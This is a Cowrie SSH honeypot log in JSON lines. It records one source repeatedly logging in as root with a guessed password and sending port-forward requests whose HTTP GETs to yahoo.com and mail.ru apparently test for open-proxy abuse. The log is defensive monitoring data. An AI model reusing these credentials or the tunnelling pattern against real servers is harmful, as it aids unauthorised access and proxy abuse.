{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:20.873899Z","src_ip":"77.83.207.83","session":"7ac9547e9cd0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":10208,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:10208","sensor":"my-vps","timestamp":"2025-08-31T03:52:21.015993Z","session":"7ac9547e9cd0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:21.065840Z","src_ip":"77.83.207.83","session":"7ac9547e9cd0"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:52:21.116274Z","src_ip":"77.83.207.83","session":"7ac9547e9cd0"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":33098,"dst_ip":"1.2.3.4","dst_port":22,"session":"fc235c7c8fb7","protocol":"ssh","message":"New connection: 77.83.207.83:33098 (1.2.3.4:22) [session: fc235c7c8fb7]","sensor":"my-vps","timestamp":"2025-08-31T03:52:21.168600Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:52:21.169528Z","src_ip":"77.83.207.83","session":"fc235c7c8fb7"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:52:21.222469Z","src_ip":"77.83.207.83","session":"fc235c7c8fb7"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:52:21.486157Z","src_ip":"77.83.207.83","session":"fc235c7c8fb7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":18433,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:18433","sensor":"my-vps","timestamp":"2025-08-31T03:52:21.540284Z","session":"fc235c7c8fb7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:21.593481Z","src_ip":"77.83.207.83","session":"fc235c7c8fb7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"77.83.207.83","src_port":19843,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:19843","sensor":"my-vps","timestamp":"2025-08-31T03:52:21.739247Z","session":"fc235c7c8fb7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:21.792201Z","src_ip":"77.83.207.83","session":"fc235c7c8fb7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":12001,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:12001","sensor":"my-vps","timestamp":"2025-08-31T03:52:21.939216Z","session":"fc235c7c8fb7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:21.991958Z","src_ip":"77.83.207.83","session":"fc235c7c8fb7"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:52:22.045784Z","src_ip":"77.83.207.83","session":"fc235c7c8fb7"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":33214,"dst_ip":"1.2.3.4","dst_port":22,"session":"347fc29d0d74","protocol":"ssh","message":"New connection: 77.83.207.83:33214 (1.2.3.4:22) [session: 347fc29d0d74]","sensor":"my-vps","timestamp":"2025-08-31T03:52:22.094845Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:52:22.095726Z","src_ip":"77.83.207.83","session":"347fc29d0d74"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:52:22.145829Z","src_ip":"77.83.207.83","session":"347fc29d0d74"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:52:22.395423Z","src_ip":"77.83.207.83","session":"347fc29d0d74"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":13750,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:13750","sensor":"my-vps","timestamp":"2025-08-31T03:52:22.447577Z","session":"347fc29d0d74"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:22.498396Z","src_ip":"77.83.207.83","session":"347fc29d0d74"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":12908,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:12908","sensor":"my-vps","timestamp":"2025-08-31T03:52:22.640500Z","session":"347fc29d0d74"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:22.690771Z","src_ip":"77.83.207.83","session":"347fc29d0d74"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":8786,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:8786","sensor":"my-vps","timestamp":"2025-08-31T03:52:22.832438Z","session":"347fc29d0d74"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:22.882590Z","src_ip":"77.83.207.83","session":"347fc29d0d74"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:52:22.933670Z","src_ip":"77.83.207.83","session":"347fc29d0d74"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":33332,"dst_ip":"1.2.3.4","dst_port":22,"session":"722a747fed6c","protocol":"ssh","message":"New connection: 77.83.207.83:33332 (1.2.3.4:22) [session: 722a747fed6c]","sensor":"my-vps","timestamp":"2025-08-31T03:52:22.983599Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:52:22.993035Z","src_ip":"77.83.207.83","session":"722a747fed6c"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:52:23.035316Z","src_ip":"77.83.207.83","session":"722a747fed6c"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:52:23.290151Z","src_ip":"77.83.207.83","session":"722a747fed6c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":868,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:868","sensor":"my-vps","timestamp":"2025-08-31T03:52:23.342285Z","session":"722a747fed6c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:23.393261Z","src_ip":"77.83.207.83","session":"722a747fed6c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"77.83.207.83","src_port":11079,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:11079","sensor":"my-vps","timestamp":"2025-08-31T03:52:23.537708Z","session":"722a747fed6c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:23.589181Z","src_ip":"77.83.207.83","session":"722a747fed6c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":25425,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:25425","sensor":"my-vps","timestamp":"2025-08-31T03:52:23.733446Z","session":"722a747fed6c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:23.784705Z","src_ip":"77.83.207.83","session":"722a747fed6c"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:52:23.836394Z","src_ip":"77.83.207.83","session":"722a747fed6c"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":33470,"dst_ip":"1.2.3.4","dst_port":22,"session":"13668aa9f694","protocol":"ssh","message":"New connection: 77.83.207.83:33470 (1.2.3.4:22) [session: 13668aa9f694]","sensor":"my-vps","timestamp":"2025-08-31T03:52:23.885802Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:52:23.895565Z","src_ip":"77.83.207.83","session":"13668aa9f694"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:52:23.936457Z","src_ip":"77.83.207.83","session":"13668aa9f694"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:52:24.231218Z","src_ip":"77.83.207.83","session":"13668aa9f694"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":22926,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:22926","sensor":"my-vps","timestamp":"2025-08-31T03:52:24.283187Z","session":"13668aa9f694"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:24.334001Z","src_ip":"77.83.207.83","session":"13668aa9f694"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":14107,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:14107","sensor":"my-vps","timestamp":"2025-08-31T03:52:24.476900Z","session":"13668aa9f694"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:24.527363Z","src_ip":"77.83.207.83","session":"13668aa9f694"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":28255,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:28255","sensor":"my-vps","timestamp":"2025-08-31T03:52:24.669067Z","session":"13668aa9f694"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:24.719803Z","src_ip":"77.83.207.83","session":"13668aa9f694"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:52:24.770998Z","src_ip":"77.83.207.83","session":"13668aa9f694"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":33580,"dst_ip":"1.2.3.4","dst_port":22,"session":"8ccc8234c471","protocol":"ssh","message":"New connection: 77.83.207.83:33580 (1.2.3.4:22) [session: 8ccc8234c471]","sensor":"my-vps","timestamp":"2025-08-31T03:52:24.820162Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:52:24.820840Z","src_ip":"77.83.207.83","session":"8ccc8234c471"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:52:24.871429Z","src_ip":"77.83.207.83","session":"8ccc8234c471"}
